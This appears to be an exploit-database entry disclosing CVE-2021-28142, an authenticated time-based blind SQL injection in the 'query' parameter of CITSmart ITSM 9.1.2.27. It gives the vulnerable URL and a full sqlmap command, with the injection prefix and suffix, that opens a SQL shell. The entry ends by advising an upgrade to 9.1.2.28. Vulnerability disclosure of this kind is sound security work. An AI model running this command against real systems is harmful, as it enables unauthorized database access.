vendor:
CITSmart ITSM
by:
skysbsb
8.8
CVSS
HIGH
Time-based Blind SQL Injection
89
CWE
Product Name: CITSmart ITSM
Affected Version From: < 9.1.2.28
Affected Version To: < 9.1.2.28
Patch Exists: YES
Related CWE: CVE-2021-28142
CPE: a:citsmart:citsmart_itsm:9.1.2.27
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2021
CITSmart ITSM 9.1.2.27 – ‘query’ Time-based Blind SQL Injection (Authenticated)
To exploit this flaw it is necessary to be authenticated. The vulnerable URL is https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale and the vulnerable parameter is 'query'. Sqlmap usage is sqlmap -u "https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix ")" --suffix "AND ('abc%'='abc" --sql-shell
Mitigation:
Upgrade to version 9.1.2.28 or later